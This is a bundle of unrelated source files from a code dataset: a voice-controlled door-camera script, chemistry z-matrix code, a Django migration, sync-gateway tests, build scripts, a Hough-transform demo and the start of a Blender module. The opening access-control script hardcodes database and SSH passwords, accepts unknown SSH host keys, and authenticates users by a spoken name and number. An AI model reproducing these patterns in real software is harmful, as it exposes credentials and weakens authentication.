mysql.connector.connect(host=\"10.0.5.246\", user=\"LMV_ADMIN\", passwd=\"MINIMOT4\", database=\"LMV\")\n mycursor = mydb.cursor()\n 
sql = \"INSERT INTO imagespath (path, name, person) VALUES (%s, %s, %s)\"\n val = (path, name, person)\n mycursor.execute(sql, val)\n mydb.commit()\n print(mycursor.rowcount, \"record inserted\")\n mydb.close()\n break\n except mysql.connector.Error as err:\n print(\"Something went wrong: {}\".format(err))\n while True:\n if(net_is_up()):\n try:\n #Almacenar la foto en servidor para mostrar en imagen\n client = paramiko.SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect('10.0.5.246', port=19930, username='lmv-codedata', password='Laboratorio', sock=proxy)\n ftp_client = client.open_sftp()\n ftp_client.put(nameservidor, '/var/www/html/ENTRADA-LMV/Images_Access/'+nameservidor)\n ftp_client.close()\n break\n except paramiko.AuthenticationException as err:\n print(\"Fallo en la autentificacion, verifica tus credenciales por favor\")\n except paramiko.BadAuthenticationType:\n print(\"ERROR\")\n except paramiko.BadHostKeyException:\n print(\"Incapaz de verificar claves del host del servidor\")\n except paramiko.ChannelException:\n print(\"ERROR\")\n except paramiko.PartialAuthentication as er:\n print(\"ERROR\")\n except paramiko.PasswordRequiredException:\n print(\"ERROR\")\n except paramiko.ProxyCommandFailure:\n print(\"ERROR\")\n except paramiko.SSHException:\n print(\"Incapaz de establecer conexion ssh\")\n finally:\n ftp_client.close()\n\ndef security_name(name, spc):\n n = name.lower()\n for x in range(0,7):\n for pat in vrb['permisos'][x]['persona']:\n if pat == n:\n if spc == vrb['permisos'][x]['id']:\n return True, vrb['permisos'][x]['name']\n return False, \"Usuario o contraseña incorrectos\"\n\ndef take_photo(name, id_):\n validacion, comprobacion = security_name(name, id_)\n if validacion:\n script_dir = os.path.dirname(__file__)\n direc = os.path.dirname(os.path.abspath(__file__))\n os.system('./webcam.sh')\n currentdate = datetime.datetime.now().strftime(\"%Y-%m-%d_%H%M\")\n real_path = currentdate +\".jpg\"\n abs_file_path = os.path.join(script_dir, real_path)\n GPIO.output(20, False)\n GPIO.output(16, True)\n time.sleep(2)\n store(direc, abs_file_path, comprobacion, real_path)\n GPIO.output(16, False)\n time.sleep(2)\n return False\n else:\n return False\n\ndef listen_welcome():\n r = sr.Recognizer()\n m = sr.Microphone()\n with m as source:\n try:\n print(\"Adjusting noise\")\n r.adjust_for_ambient_noise(source, duration=-1)\n print(\"Say something!\")\n GPIO.output(20, False)\n GPIO.output(12, True)\n print(\"LISTENED\")\n audio = r.listen(source, timeout=5, phrase_time_limit=8)\n GPIO.output(12, False)\n GPIO.output(20, True)\n print(\"Trying to recognize\")\n x = r.recognize_google(audio, language=\"es-mx\")\n x = x.split(\" \")\n #print(x)\n if len(x) != 2:\n return False, \"\", \"\"\n idu, nombre, estado = get_name(x)\n #print(frase, nombre, estado)\n if estado == False:\n return False, nombre, idu\n if (idu == \"cero\" or idu == \"uno\" or idu == \"dos\" or idu ==\"tres\" or idu == 'cuatro' or idu == 'cinco'or idu == 'seis'):\n return True, nombre, idu\n except sr.UnknownValueError:\n print(\"Error trying to understand what you say to me\")\n return False, \"\", \"\"\n except sr.RequestError as e:\n print(\"I can't reach google, it's to sad\")\n return False, \"\", \"\"\n except Exception as e:\n print(e)\n return False, \"\", \"\"\n except LookupError:\n return False, \"\", \"\"\n except UnicodeDecodeError:\n return False, \"\", \"\"\n return False, \"\", \"\"\n\nwhile True:\n try:\n flag_order = 
True\n flag_start, nam, id_ = listen_welcome()\n if flag_start:\n while flag_order:\n flag_order = take_photo(nam, id_)\n except ValueError:\n print(\"Measurement stopped by Error\")\n except OSError as err:\n print(\"OS error: {0}\".format(err))\n #except KeyboardInterrupt:\n # print(\"Measurement stopped by User\")\n","sub_path":"visualizacion_photo/controlscript.py","file_name":"controlscript.py","file_ext":"py","file_size_in_byte":6854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"437280430","text":"#!/usr/bin/env python\n\n\"\"\"\nAuthor: Rosa Bulo, 2021\n\nClass holding a z-matrix with reordered atoms\n\"\"\"\n\nimport sys\nimport os\nimport copy\nimport numpy\nfrom scm.plams import angle\nfrom scm.plams import dihedral\nfrom scm.plams import axis_rotation_matrix\n\n__all__ = ['ZMatrix']\n\nclass ZMatrix :\n \"\"\"\n Holds the zmatrix for a molecule, with reordered atoms\n \"\"\"\n def __init__ (self) :\n \"\"\"\n Initiates an instance of the ZMatrix class\n \"\"\"\n self.mol = None\n self.atom_list = None\n self.connectivity = None\n self.indices = None\n\n self.backbone = None\n self.terminal_atoms = None\n\n self.angle_units = 'radian'\n\n def prepare_state (self, mol) :\n \"\"\"\n Generates optimal z-martrix by reordering the atoms\n \"\"\"\n self.mol = mol\n self.backbone = self.mol.find_main_chain()\n self.terminal_atoms = self.mol.get_terminal_atoms()\n self.create_connectivity()\n self.get_values()\n\n def get_values (self, coords=None) :\n \"\"\"\n Get the values in the zmatrix\n\n Note: Angles are in radians\n \"\"\"\n mol = self.mol.copy()\n if coords is not None :\n mol.from_array(coords)\n else :\n coords = mol.as_array()\n\n internal_coords = []\n for i,at in enumerate(self.atom_list) :\n atoms = [mol.atoms[at]]\n conect = self.connectivity[i]\n atoms += [mol.atoms[at] for at in conect]\n values = []\n dist = 0.\n if len(conect) > 0 :\n dist = mol.atoms[at].distance_to(mol.atoms[conect[0]])\n values.append(dist)\n phi = 0.\n if len(conect) > 1 :\n vec1 = coords[at] - coords[conect[0]]\n vec2 = coords[conect[1]] - coords[conect[0]]\n phi = angle(vec1, vec2, result_unit=self.angle_units)\n values.append(phi)\n theta = 0.\n if len(conect) > 2 :\n theta = dihedral(atoms[0].coords, atoms[1].coords, atoms[2].coords, atoms[3].coords, unit=self.angle_units)\n values.append(theta)\n internal_coords.append(values)\n internal_coords = numpy.array(internal_coords)\n\n return internal_coords\n\n def get_cartesian_coords (self, zmat_values) :\n \"\"\"\n Convert z-matrix values to Cartesian coordinates\n\n * ``zmat_values`` -- All angles are in radians\n \"\"\"\n coords = numpy.zeros((len(self.mol),3))\n\n # Create the internal coordinate axes\n v_ij, v_m, v_n = numpy.identity(3)\n\n coord = numpy.zeros(3)\n for i,iat in enumerate(self.atom_list) :\n conect = self.connectivity[i]\n d,a,t = zmat_values[i]\n\n if len(conect) == 0 :\n coords[iat] = 0.\n continue\n \n i = conect[0]\n # Create the internal coordinate axes\n v_ij, v_m, v_n = numpy.identity(3) \n if len(conect) > 1 : \n j = conect[1]\n # Get the vector from i to j\n v_ij = coords[j] - coords[i]\n v_ij = v_ij / numpy.sqrt((v_ij**2).sum())\n \n if len(conect) > 2 :\n k = conect[2]\n # Get the vector from j to k\n v_jk = coords[k] - coords[j]\n \n # Get the vector orthoganl to the plane ijk\n v_n = numpy.cross(v_ij,v_jk)\n v_n = v_n / numpy.sqrt((v_n**2).sum())\n \n # Get the vector orthogonal to the plane though i, j, and v_n\n v_m = numpy.cross(v_n,v_ij)\n v_m = v_m / 
numpy.sqrt((v_m**2).sum())\n \n # Now get the coordinates in the coordinate system of v_ij, v_m, and v_n\n coord[0] = d * numpy.cos(a)\n coord[1] = d * numpy.sin(a) * numpy.cos(t)\n coord[2] = d * numpy.sin(a) * numpy.sin(-t)\n \n # translate it to the actual xyz coordinate system\n coords[iat] = coords[i] + (coord[0]*v_ij) + (coord[1]*v_m) + (coord[2]*v_n)\n\n return coords\n\n def print_zmatrix (self, zmat_values) :\n \"\"\"\n Write the z-matrix\n \"\"\"\n elements = [at.symbol for at in self.mol.atoms]\n block = ''\n conns = numpy.zeros(3)\n for i,el in enumerate(elements) :\n block += '%8s '%(el)\n conns[:len(self.connectivity[i])] = self.connectivity[i]\n for iat in conns :\n block += '%5i '%(iat)\n for v in zmat_values[i] :\n block += '%20.10f '%(v)\n block += '\\n'\n return block\n\n def create_connectivity (self) :\n \"\"\"\n Create the new atom ordering and connectivity\n \"\"\"\n # Get the starting atom (will fail for methane)\n start_index = self.get_first_atom()\n if start_index is None :\n print ('Warning: No zmatrix could be generated')\n return\n start = self.backbone[start_index]\n\n # Get the first four atoms in the new z-matrix\n atom_list = self.backbone[start_index:start_index+4]\n connectivity = [[], atom_list[:1][::-1], atom_list[:2][::-1], atom_list[:3][::-1]] # Use internal numbering instead?\n level_dictionary = {0:[atom_list[0]],1:[atom_list[1]],2:[atom_list[2]],3:[atom_list[3]]}\n\n # Now loop over neighbors starting with the start atom\n level = 0\n while level in level_dictionary :\n for at in level_dictionary[level] :\n iat = atom_list.index(at)\n neighbors = [self.mol.index(n)-1 for n in self.mol.neighbors(self.mol.atoms[at])]\n for at_next in neighbors :\n if at_next in atom_list : continue\n # This atom we will append to the z-matrix\n atom_list.append(at_next)\n if not level+1 in level_dictionary :\n level_dictionary[level+1] = []\n level_dictionary[level+1].append(at_next)\n conect = [at] + connectivity[iat][:2]\n # Now what if there is not enough connectivity here (only happens for first two atoms)?\n if len(conect) < 3 :\n conect = atom_list[iat:iat+3]\n connectivity.append(conect)\n level += 1\n\n self.atom_list = atom_list\n self.connectivity = connectivity\n self.indices = [self.atom_list.index(i) for i in range(len(self.mol))]\n\n def get_first_atom (self) :\n \"\"\"\n Get the starting atom (heavy atom with highest valence?)\n\n Note: May change self.backbone!\n \"\"\"\n # Get the starting atom (heavy atom with highest valence?)\n valences = []\n for at in self.backbone : \n nbs = [n for n in self.mol.neighbors(self.mol.atoms[at]) if not self.mol.index(n)-1 in self.terminal_atoms]\n valences.append(len(nbs))\n indices = numpy.array(valences).argsort()\n\n if len(self.backbone) < 4 :\n # I have to create a new backbone in this case\n self.extend_backbone()\n if len(self.backbone) < 4 :\n # Only methane\n return None\n for ind in indices :\n # The chain has to have 3 more atoms following the starting atom\n if len(self.backbone) > ind+3 :\n start_index = ind\n break\n elif ind >= 3 :\n # Invert the backbone\n self.backbone = self.backbone[::-1]\n start_index = len(self.backbone)-ind-1\n break\n return start_index\n\n def extend_backbone (self) :\n \"\"\"\n Extend the backbone at both ends\n \"\"\"\n pos = 0\n neighbor = self.find_neighbor_to_backbone(pos)\n if neighbor is not None :\n self.backbone = [neighbor] + self.backbone\n pos = -1\n neighbor = self.find_neighbor_to_backbone(pos)\n if neighbor is not None :\n self.backbone = self.backbone + 
[neighbor]\n\n def find_neighbor_to_backbone (self, pos) :\n \"\"\"\n Find extension atom to backbone\n\n * ``pos`` -- Integer representing the head (0) or the tail (-1) of the backbone\n \"\"\"\n neighbor = None\n neighbors = [self.mol.index(n)-1 for n in self.mol.neighbors(self.mol.atoms[self.backbone[pos]])]\n neighbors = [atn for atn in neighbors if not atn in self.backbone]\n if len(neighbors) > 0 :\n neighbor = neighbors[0]\n return neighbor\n\n","sub_path":"TorsionNet/DavidNet/conformers/molecularsystem/zmatrix.py","file_name":"zmatrix.py","file_ext":"py","file_size_in_byte":10838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"84897908","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('register', '0004_remove_usuario_email'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Cliente',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),\n ('nombre', models.CharField(max_length=30)),\n ('apellido', models.CharField(max_length=30)),\n ('direccion', models.CharField(max_length=30)),\n ('telefono', models.IntegerField()),\n ],\n ),\n migrations.RemoveField(\n model_name='usuario',\n name='apellido',\n ),\n migrations.RemoveField(\n model_name='usuario',\n name='direccion',\n ),\n migrations.RemoveField(\n model_name='usuario',\n name='nombre',\n ),\n migrations.RemoveField(\n model_name='usuario',\n name='telefono',\n ),\n migrations.AlterField(\n model_name='ṕroveedor',\n name='usuario',\n field=models.ForeignKey(to='register.Cliente'),\n ),\n migrations.AddField(\n model_name='cliente',\n name='usuario',\n field=models.ForeignKey(to='register.Usuario'),\n ),\n ]\n","sub_path":"AQuienLlamo/register/migrations/0005_auto_20150611_0211.py","file_name":"0005_auto_20150611_0211.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"442736342","text":"import json\n\n\ndef main():\n data = {\"mod_vector\": {\"host1\": 21, \"host2\": 10}, \"sync_vector\": {\"host1\": 2, \"host2\": 15}}\n with open('example.json', 'w') as f:\n json.dump(data, f)\n\nif __name__ == '__main__':\n main()\n","sub_path":"fsync/json/write_sample_json.py","file_name":"write_sample_json.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"557321361","text":"\n\nfrom basetestcase import BaseTestCase\n\nfrom TestInput import TestInputSingleton\nfrom sg.sg_base import GatewayBaseTest\nfrom remote.remote_util import RemoteMachineShellConnection\n\nhelp = ['This script creates an init service to run a sync_gateway instance.',\n 'If you want to install more than one service instance',\n 'create additional services with different names.',\n '', 'sync_gateway_service_install.sh', ' -h --help',\n ' --runas=',\n ' --runbase=',\n ' --sgpath=',\n ' --cfgpath=',\n ' --logsdir=', '']\n\n\nclass SGInstallerTest(GatewayBaseTest):\n def setUp(self):\n TestInputSingleton.input.test_params[\"default_bucket\"] = False\n super(SGInstallerTest, self).setUp()\n\n def tearDown(self):\n super(SGInstallerTest, self).tearDown()\n\n\n def basicInstall(self):\n for server in self.servers:\n shell = RemoteMachineShellConnection(server)\n self.install(shell)\n self.kill_processes_gateway(shell)\n 
self.uninstall_gateway(shell)\n shell.disconnect()\n\n\n def testSGServiceInstallHelp(self):\n shell = RemoteMachineShellConnection(self.master)\n self.kill_processes_gateway(shell)\n self.uninstall_gateway(shell)\n self.install_gateway(shell)\n output, error = self.run_sync_gateway_service_install(shell, \"-h\")\n self.assertEqual(error, [])\n self.assertEqual(output, help)\n\n output, error = self.run_sync_gateway_service_install(shell)\n self.assertEqual(error[0], \"The sync_gateway runtime user account does not exist \\\"sync_gateway\\\".\")\n self.assertEqual(output, [])\n\n output, error = self.run_sync_gateway_service_install(shell, \"bla-bla-bla\")\n temp_help = [\"ERROR: unknown parameter \\\"bla-bla-bla\\\"\"]\n temp_help.extend(help)\n\n self.assertEqual(error, [])\n self.assertEqual(output, temp_help)\n shell.disconnect()\n\n\n def testSGServiceInstallNoUser(self):\n shell = RemoteMachineShellConnection(self.master)\n self.kill_processes_gateway(shell)\n self.uninstall_gateway(shell)\n self.install_gateway(shell)\n output, error = self.run_sync_gateway_service_install(shell, self.extra_param)\n self.assertEqual(error, [self.expected_error])\n self.assertEqual(output, [])\n shell.disconnect()","sub_path":"pytests/sg/sginstalltests.py","file_name":"sginstalltests.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"21927385","text":"class UI(object):\n def __init__(self, screen_width, screen_height, plus = 0):\n self.screen_width = screen_width\n self.screen_height = screen_height\n self.plus = plus\n \n def display(self, grid, policy, r):\n s = self.screen_width / 4\n for rows in grid:\n for cell in rows:\n \n x = (cell.j * s) + self.plus\n y = cell.i * s\n stroke(255)\n strokeWeight(2)\n fill(255,255,255,100)\n rect(x, y, s, s)\n if cell.terminal:\n rect(x+6, y+6, s-12, s-12)\n fill(255,255,255)\n text(\"{0:.4f}\".format(cell.u), x+(s / 6), y + (s /2))\n stroke(0, 102, 255) \n strokeWeight(3)\n line(self.plus, 0, self.plus, self.screen_height)\n line(self.screen_width + self.plus, 0, self.screen_width + self.plus, self.screen_height)\n \n half = self.screen_height / 2\n txt = \"R= \" + str(r) +\" \\t POLICY:\"\n fill(255,255,255)\n text(txt, 20 + self.plus , half + 10)\n \n for i in range(3):\n for j in range(4):\n pass\n x_ = (j * s) + self.plus\n y_ = (i * s) + (half + 20)\n \n stroke(255)\n strokeWeight(2)\n fill(255,255,255,100)\n rect(x_, y_, s, s)\n fill(255,255,255)\n text(\"{}\".format(policy[i][j]), x_+(s / 6), y_ + (s /2))\n","sub_path":"MDP_Algorithm/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"293236598","text":"# build.py\nimport os\nimport platform\nimport sys\nfrom distutils.core import setup\n\nfrom torch.utils.ffi import create_extension\n\nextra_compile_args = ['-std=c++11', '-fPIC']\nwarp_ctc_path = \"../build\"\n\nif platform.system() == 'Darwin':\n lib_ext = \".dylib\"\nelse:\n lib_ext = \".so\"\n\nif \"WARP_CTC_PATH\" in os.environ:\n warp_ctc_path = os.environ[\"WARP_CTC_PATH\"]\nif not os.path.exists(os.path.join(warp_ctc_path, \"libwarpctc\" + lib_ext)):\n print((\"Could not find libwarpctc.so in {}.\\n\"\n \"Build warp-ctc and set WARP_CTC_PATH to the location of\"\n \" libwarpctc.so (default is '../build')\").format(warp_ctc_path))\n sys.exit(1)\ninclude_dirs = [os.path.realpath('../include')]\n\nffi = create_extension(\n 
name='warp_ctc',\n language='c++',\n headers=['src/binding.h'],\n sources=['src/binding.cpp'],\n with_cuda=True,\n include_dirs=include_dirs,\n library_dirs=[os.path.realpath(warp_ctc_path)],\n runtime_library_dirs=[os.path.realpath(warp_ctc_path)],\n libraries=['warpctc'],\n extra_compile_args=extra_compile_args)\nffi = ffi.distutils_extension()\nffi.name = 'warpctc_pytorch._warp_ctc'\nsetup(\n name=\"warpctc_pytorch\",\n version=\"0.1\",\n packages=[\"warpctc_pytorch\"],\n ext_modules=[ffi],\n)\n","sub_path":"pytorch_binding/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"180910482","text":"import requests\nimport os.path\n\nURL = \"http://127.0.0.1:3000/purchase\"\n\npath = os.path.abspath(os.path.join(\"\", os.pardir))\n\nid_pais = open(path + \"/inputs/values/purchase/idPai.txt\",\"r\")\nstatuses = open(path + \"/inputs/values/purchase/status.txt\",\"r\")\ntotal_prices = open(path + \"/inputs/values/purchase/totalPrice.txt\",\"r\")\nerrors = open(\"errorLog.txt\",\"a+\")\n\n\ncount = 1\nwhile 1:\n\tid_pai = id_pais.readline().strip('\\n')\n\tstatus = statuses.readline().strip('\\n')\n\ttotal_price = total_prices.readline().strip('\\n')\n\tdate = \"2018-06-14 4:20:00\"\n\n\tif not id_pai:\n\t\tbreak\n\t\t\n\tdata = {'id_pai':id_pai,\n\t 'status':status,\n\t 'total_price': total_price,\n\t 'date':date\n\t }\n\tr = requests.post(url = URL, data = data)\n\n\tif r.status_code == 200:\n\t\tprint(\"Successfully inserted 1 row at purchase table!\")\n\telse:\n\t\tprint(\"Something went terribly wrong at the purchase table!\")\n\t\terrors.write(\"Error at purchase table (line \" + str(count) + \"): \" + '('+ id_pai +', '+ status +','+total_price + ',' + date + \")\" + '\\n')\n\tcount+=1","sub_path":"post/purchase.py","file_name":"purchase.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"522238249","text":"import cv2\nimport numpy as np\n\n# Read image\norg_img = cv2.imread(\"hough.jpg\")\nimg = cv2.imread(\"hough.jpg\", 0)\n\n###<<<<<<-----------------------------Edge detection---------------------------->>>>>>######\n\nlargest = 255\nsmallest = 0\nr,c = img.shape\n\ncount = 0\n\nimg1 = np.zeros(img.shape)\nkernel = [[-1,0,1],[-2,0,2],[-1,0,1]] \n\nfor x in range(1,r-1):\n for y in range(1,c-1): \n img1[x][y]= img[x-1][y-1] * kernel[0][0] + \\\n img[x-1][y] * kernel[0][1] + \\\n img[x-1][y+1] * kernel[0][2] + \\\n img[x][y-1] * kernel[1][0] + \\\n img[x][y] * kernel[1][1] + \\\n img[x][y+1] * kernel[1][2] + \\\n img[x+1][y-1] * kernel[2][0] + \\\n img[x+1][y] * kernel[2][1] + \\\n img[x+1][y+1] * kernel[2][2]\n \n if (img1[x][y] > largest):\n largest = img1[x][y]\n\nfor x in range(0,r):\n for y in range(0,c):\n img1[x][y] = (np.abs(img1[x][y]) / np.abs(largest))*255\n if (img1[x][y] > 80):\n img1[x][y] = 255\n count += 1\n else:\n img1[x][y] = 0\n\n \ncv2.imwrite('edge.jpg', img1)\n\n###<<<<<<-----------------------------create accumulator---------------------------->>>>>>######\n \nd = np.sqrt((r**2)+(c**2))\nd = int(d)\n\naccumulator = np.zeros((d,360))\n\nfor x in range(0,r):\n for y in range(0,c):\n if (img1[x][y] == 255):\n for deg in range (-180,180):\n r = x*np.cos(np.deg2rad(deg)) + y*np.sin(np.deg2rad(deg))\n r = int(r)\n if (r > 0 and r < d):\n accumulator[r][deg] = accumulator[r][deg]+1 \n 
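# --- Illustrative sketch (not part of the original script): the nested
# Hough voting loop above can be vectorized with NumPy. For each edge pixel,
# compute rho for all angles at once and vote with np.add.at. Note the column
# index here is the theta array index (deg + 180), not the raw degree.
import numpy as np

def hough_votes(edge_img, n_rho):
    thetas = np.deg2rad(np.arange(-180, 180))
    acc = np.zeros((n_rho, 360))
    rows, cols = np.nonzero(edge_img == 255)
    for x, y in zip(rows, cols):  # same (row, col) convention as the loop above
        rhos = (x * np.cos(thetas) + y * np.sin(thetas)).astype(int)
        ok = (rhos > 0) & (rhos < n_rho)
        np.add.at(acc, (rhos[ok], np.nonzero(ok)[0]), 1)
    return acc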
\ncv2.imwrite(\"accumulator.jpg\",accumulator)\n\n###<<<<<<---------------------selecting highest voted points------------------------->>>>>>######\n\nidx = np.unravel_index(np.argsort(accumulator.ravel())[-1000:], accumulator.shape)\n\n###<<<<<<-----------------------------red lines detection---------------------------->>>>>>######\n\nrho = []\ntheta = []\n\nfor i in range (len(idx[0])):\n x = idx[0][i]\n y = idx[1][i]\n if (y == 306):\n rho.append(x)\n theta.append(y)\n if (y == 126):\n rho.append(x)\n theta.append(y)\n \nimg2 = cv2.imread(\"hough.jpg\", 0)\nimg3 = cv2.imread(\"hough.jpg\")\nr,c = img2.shape\n\nx = []\ny = []\n\nfor i in range (len(theta)):\n p = rho[i]\n q = theta[i]\n for i in range (r):\n k = (p-(i*np.cos(np.deg2rad(q))))/(np.sin(np.deg2rad(q)))\n if (k > 0 and k <= 666):\n x.append(i)\n y.append(int(k)) \n \nfor i in range (len(x)):\n a = x[i]\n b = y[i]\n img3[a][b] = [0,255,0]\n\ncv2.imwrite(\"blue_line.jpg\", img3)\n\n###<<<<<<-----------------------------red lines detection---------------------------->>>>>>######\n\nrho = []\ntheta = []\n\nidx = np.unravel_index(np.argsort(accumulator.ravel())[-1000:], accumulator.shape)\n\nfor i in range (len(idx[0])):\n x = idx[0][i]\n y = idx[1][i]\n if (y == 92):\n rho.append(x)\n theta.append(y)\n \nimg2 = cv2.imread(\"hough.jpg\", 0)\nimg3 = cv2.imread(\"hough.jpg\")\nr,c = img2.shape\n\nx = []\ny = []\n\nfor i in range (len(theta)):\n p = rho[i]\n q = theta[i]\n for i in range (r):\n k = (p-(i*np.cos(np.deg2rad(q))))/(np.sin(np.deg2rad(q)))\n if (k > 0 and k <= 666):\n x.append(i)\n y.append(int(k)) \n \nfor i in range (len(x)):\n a = x[i]\n b = y[i]\n img3[a][b] = [0,255,0]\n \ncv2.imwrite(\"red_line.jpg\", img3)","sub_path":"Computer Vision and Image Processing/Project 3 - Morphology image processing, Image segmentation and point detection, Hough transform/3. Hough transform/a,b/Task3_a_b.py","file_name":"Task3_a_b.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"361577733","text":"#!/usr/bin/env python3\n\n# ***** BEGIN GPL LICENSE BLOCK *****\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n# ***** END GPL LICENCE BLOCK *****\n\nimport os\nimport logging\n\nfrom . 
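# --- Illustrative sketch (not part of the original files): the peak-picking
# line above, np.unravel_index(np.argsort(acc.ravel())[-K:], acc.shape),
# converts the K largest flat indices back into (rho, theta) pairs:
import numpy as np

acc = np.array([[0, 5], [9, 1]])
flat_topk = np.argsort(acc.ravel())[-2:]       # indices of the 2 largest votes
peaks = np.unravel_index(flat_topk, acc.shape)
assert list(zip(*peaks)) == [(0, 1), (1, 0)]   # cells holding votes 5 and 9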
import blendfile\n\n# gives problems with scripts that use stdout, for testing 'bam deps' for eg.\nDEBUG = False\nVERBOSE = DEBUG or False # os.environ.get('BAM_VERBOSE', False)\nTIMEIT = False\n\nUSE_ALEMBIC_BRANCH = True\n\n\nclass C_defs:\n __slots__ = ()\n\n def __new__(cls, *args, **kwargs):\n raise RuntimeError(\"%s should not be instantiated\" % cls)\n\n # DNA_sequence_types.h (Sequence.type)\n SEQ_TYPE_IMAGE = 0\n SEQ_TYPE_META = 1\n SEQ_TYPE_SCENE = 2\n SEQ_TYPE_MOVIE = 3\n SEQ_TYPE_SOUND_RAM = 4\n SEQ_TYPE_SOUND_HD = 5\n SEQ_TYPE_MOVIECLIP = 6\n SEQ_TYPE_MASK = 7\n SEQ_TYPE_EFFECT = 8\n\n IMA_SRC_FILE = 1\n IMA_SRC_SEQUENCE = 2\n IMA_SRC_MOVIE = 3\n\n # DNA_modifier_types.h\n eModifierType_MeshCache = 46\n\n # DNA_particle_types.h\n PART_DRAW_OB = 7\n PART_DRAW_GR = 8\n\n # DNA_object_types.h\n # Object.transflag\n OB_DUPLIGROUP = 1 << 8\n\n if USE_ALEMBIC_BRANCH:\n CACHE_LIBRARY_SOURCE_CACHE = 1\n\nlog_deps = logging.getLogger(\"path_walker\")\nlog_deps.setLevel({\n (True, True): logging.DEBUG,\n (False, True): logging.INFO,\n (False, False): logging.WARNING\n}[DEBUG, VERBOSE])\n\nif VERBOSE:\n def set_as_str(s):\n if s is None:\n return \"None\"\n return \", \".join(sorted(str(i) for i in s))\n\n\nclass FPElem:\n \"\"\"\n Tiny filepath class to hide blendfile.\n \"\"\"\n\n __slots__ = (\n \"basedir\",\n\n # library link level\n \"level\",\n\n # True when this is apart of a sequence (image or movieclip)\n \"is_sequence\",\n\n \"userdata\",\n )\n\n def __init__(self, basedir, level,\n # subclasses get/set functions should use\n userdata):\n self.basedir = basedir\n self.level = level\n self.is_sequence = False\n\n # subclass must call\n self.userdata = userdata\n\n def files_siblings(self):\n return ()\n\n # --------\n # filepath\n\n def filepath_absolute_resolve(self, basedir=None):\n \"\"\"\n Resolve the filepath, with the option to override the basedir.\n \"\"\"\n filepath = self.filepath\n if filepath.startswith(b'//'):\n if basedir is None:\n basedir = self.basedir\n return os.path.normpath(os.path.join(\n basedir,\n utils.compatpath(filepath[2:]),\n ))\n else:\n return utils.compatpath(filepath)\n\n def filepath_assign_edits(self, filepath, binary_edits):\n self._set_cb_edits(filepath, binary_edits)\n\n @staticmethod\n def _filepath_assign_edits(block, path, filepath, binary_edits):\n \"\"\"\n Record the write to a separate entry (binary file-like object),\n this lets us replay the edits later.\n (so we can replay them onto the clients local cache without a file transfer).\n \"\"\"\n import struct\n assert(type(filepath) is bytes)\n assert(type(path) is bytes)\n ofs, size = block.get_file_offset(path)\n # ensure we dont write past the field size & allow for \\0\n filepath = filepath[:size - 1]\n binary_edits.append((ofs, filepath + b'\\0'))\n\n @property\n def filepath(self):\n return self._get_cb()\n\n @filepath.setter\n def filepath(self, filepath):\n self._set_cb(filepath)\n\n @property\n def filepath_absolute(self):\n return self.filepath_absolute_resolve()\n\n\nclass FPElem_block_path(FPElem):\n \"\"\"\n Simple block-path:\n userdata = (block, path)\n \"\"\"\n __slots__ = ()\n\n def _get_cb(self):\n block, path = self.userdata\n return block[path]\n\n def _set_cb(self, filepath):\n block, path = self.userdata\n block[path] = filepath\n\n def _set_cb_edits(self, filepath, binary_edits):\n block, path = self.userdata\n self._filepath_assign_edits(block, path, filepath, binary_edits)\n\n\nclass FPElem_sequence_single(FPElem):\n \"\"\"\n Movie sequence\n userdata = (block, 
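# --- Illustrative sketch (not part of the original module): the
# `filepath_absolute_resolve` method above implements Blender's path
# convention, where a leading b'//' marks a path as relative to the directory
# of the .blend file. The paths below are made up; POSIX separators assumed.
import os

def resolve_blend_path(filepath: bytes, basedir: bytes) -> bytes:
    if filepath.startswith(b'//'):
        return os.path.normpath(os.path.join(basedir, filepath[2:]))
    return filepath  # already absolute

assert resolve_blend_path(b'//textures/wood.png', b'/projects/scene') == \
    b'/projects/scene/textures/wood.png'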
